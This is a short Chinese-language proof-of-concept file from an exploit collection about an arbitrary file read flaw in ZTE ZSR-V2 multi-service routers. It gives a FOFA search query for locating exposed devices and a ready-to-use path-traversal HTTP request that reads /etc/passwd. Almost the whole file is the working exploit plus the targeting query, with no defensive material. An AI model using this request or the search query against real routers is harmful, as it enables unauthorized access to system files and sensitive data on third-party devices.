POC/wpoc/中兴/中兴ZTE-ZSR-V2系列多业务路由器存在任意文件读取漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

18 lines
443 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 中兴ZTE-ZSR-V2系列多业务路由器存在任意文件读取漏洞
中兴ZTE-ZSR-V2系列多业务路由器存在任意文件读取漏洞任意文件下载漏洞可能导致敏感信息泄露、数据盗窃及其他安全风险从而对系统和用户造成严重危害。
## fofa
```javascript
title="ZSRV2路由器Web管理系统"
```
## poc
```
GET /css//../../../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
```